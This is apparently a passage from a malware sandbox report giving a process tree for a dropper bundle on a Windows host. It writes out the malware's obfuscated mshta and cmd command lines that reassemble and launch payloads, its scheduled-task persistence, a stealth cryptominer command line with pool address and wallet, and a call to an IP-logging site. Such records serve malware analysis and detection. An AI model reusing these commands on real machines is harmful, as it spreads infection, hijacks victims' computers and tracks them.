C:\Users\Admin\AppData\Roaming\7651461.exe"C:\Users\Admin\AppData\Roaming\7651461.exe"5⤵
- Executes dropped EXE
PID:2436
-
-
C:\Users\Admin\AppData\Roaming\2141197.exe"C:\Users\Admin\AppData\Roaming\2141197.exe"5⤵
- Executes dropped EXE
PID:2596
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe3⤵
- Loads dropped DLL
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed096a1bff61.exeWed096a1bff61.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:836 -
C:\Users\Admin\AppData\Roaming\3974731.exe"C:\Users\Admin\AppData\Roaming\3974731.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604
-
-
C:\Users\Admin\AppData\Roaming\7957989.exe"C:\Users\Admin\AppData\Roaming\7957989.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Users\Admin\AppData\Roaming\8961721.exe"C:\Users\Admin\AppData\Roaming\8961721.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Users\Admin\AppData\Roaming\7588482.exe"C:\Users\Admin\AppData\Roaming\7588482.exe"7⤵
- Executes dropped EXE
PID:2284
-
-
C:\Users\Admin\AppData\Roaming\1573578.exe"C:\Users\Admin\AppData\Roaming\1573578.exe"7⤵
- Executes dropped EXE
PID:1536 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:2220
-
-
-
C:\Users\Admin\AppData\Roaming\2455260.exe"C:\Users\Admin\AppData\Roaming\2455260.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
PID:900
-
-
-
C:\Users\Admin\AppData\Roaming\5934997.exe"C:\Users\Admin\AppData\Roaming\5934997.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵PID:240
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"6⤵
- Executes dropped EXE
PID:908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 9167⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
PID:3920
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2716 -s 14207⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"6⤵
- Executes dropped EXE
PID:1000 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:556
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"8⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵
- Executes dropped EXE
PID:2872 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:3452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:3684
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )10⤵PID:2672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC11⤵PID:2428
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"12⤵PID:3260
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC12⤵PID:3800
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"9⤵
- Kills process with taskkill
PID:1856
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
PID:2824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit7⤵PID:2384
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"6⤵
- Executes dropped EXE
PID:240
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"6⤵
- Executes dropped EXE
PID:3324
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"6⤵
- Executes dropped EXE
PID:3480 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3836 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3672
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Creates scheduled task(s)
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3412
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe9⤵
- Executes dropped EXE
PID:3404 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2192 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵
- Executes dropped EXE
PID:3712 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"12⤵PID:4012
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth11⤵
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe3⤵
- Loads dropped DLL
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:920 -
C:\Users\Admin\Pictures\Adobe Films\uTYF4Szi1W3vSP2gbPT0wzv0.exe"C:\Users\Admin\Pictures\Adobe Films\uTYF4Szi1W3vSP2gbPT0wzv0.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 14325⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe3⤵
- Loads dropped DLL
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0971f17486f8.exeWed0971f17486f8.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:736 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0971f17486f8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe3⤵PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe3⤵
- Loads dropped DLL
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0901eb1dae126e32.exe5⤵
- Executes dropped EXE
PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed0901eb1dae126e32.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone3⤵
- Loads dropped DLL
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09cfb2f9758281d8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09cfb2f9758281d8.exe" & exit5⤵PID:2808
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09cfb2f9758281d8.exe" /f6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe3⤵
- Loads dropped DLL
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09e95ff6b5.exeWed09e95ff6b5.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1748 -
C:\Users\Public\run.exeC:\Users\Public\run.exe5⤵
- Executes dropped EXE
PID:1032 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:2828
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1704 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji76⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:828 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:828 CREDAT:275457 /prefetch:27⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2492
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:828 CREDAT:930828 /prefetch:27⤵PID:1576
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe3⤵PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe3⤵
- Loads dropped DLL
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09977fdc12334.exeWed09977fdc12334.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:3036 -
C:\Users\Admin\Pictures\Adobe Films\ZuvYxb7vH8W1fyEV5Q720iS5.exe"C:\Users\Admin\Pictures\Adobe Films\ZuvYxb7vH8W1fyEV5Q720iS5.exe"5⤵
- Executes dropped EXE
PID:2544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 14805⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe3⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed094c47c32b.exeWed094c47c32b.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:588 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))5⤵PID:2424
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"6⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF7⤵
- Executes dropped EXE
PID:816 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))8⤵PID:2452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"9⤵PID:2504
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))8⤵PID:2128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t9⤵PID:1584
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "10⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"10⤵PID:2504
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU10⤵PID:2660
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe3⤵
- Loads dropped DLL
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\is-EAHOI.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-EAHOI.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$40134,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09d27135e5a8b3b.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:368 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09d27135e5a8b3b.exe" /SILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2104
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe3⤵
- Loads dropped DLL
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe3⤵
- Loads dropped DLL
PID:956 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09abf83d9c2.exeWed09abf83d9c2.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:608 -
C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS033BA646\Wed09abf83d9c2.exe" -u5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2092
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9DAF197F-1A91-4652-AFDA-C320E6D56145} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2748
-
C:\Users\Admin\AppData\Roaming\brvwitdC:\Users\Admin\AppData\Roaming\brvwitd2⤵PID:3492
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:1124
-
-
C:\Users\Admin\AppData\Roaming\brvwitdC:\Users\Admin\AppData\Roaming\brvwitd2⤵PID:3448
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F9DA4B8C-98FC-4E06-93F0-1B7010EA9EFB} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\27DB.exeC:\Users\Admin\AppData\Local\Temp\27DB.exe1⤵PID:2712